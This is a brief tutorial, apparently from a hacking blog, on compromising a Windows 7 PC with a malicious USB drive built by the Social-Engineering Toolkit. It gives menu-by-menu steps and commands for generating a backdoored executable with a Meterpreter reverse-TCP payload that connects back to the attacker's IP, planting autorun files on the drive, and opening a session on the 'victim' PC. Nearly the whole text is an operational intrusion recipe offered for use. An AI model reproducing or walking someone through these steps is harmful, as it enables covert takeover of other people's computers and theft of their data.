Hack Windows 7 PC using USB Device and SET Toolkit (Infectious Media Generator Attack)

Infectious Media Generator is a relatively simple attack vector. SET will create a Metasploit-based payload, setup a listener for you and generate a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if AutoRun is enabled, the code will automatically execute and take control of the machine.

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now we will choose option 1, “Social-Engineering Attacks

Now choose option 3, “Infectious Media Generator

Choose option 2, “Standard Metaspolit Executable

Enter IP Address for Reverse Connection type your IP Address (IP Address of Attacker PC)

Now choose 2 “Windows reverse_tcp Meterpreter”, but you have several to choose from including your own program.

Choose option 16, “Backdoored Executable (BEST)

Port of the attacker computer. In this example I use port 4444, but you can change to 443

There’s two file autorun.inf and program.exe inside /pentest/exploits/set/autorun folder

Now copy both file in USB Drive When the victim plug our malicious USB and the autorun working

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Suraj Virus

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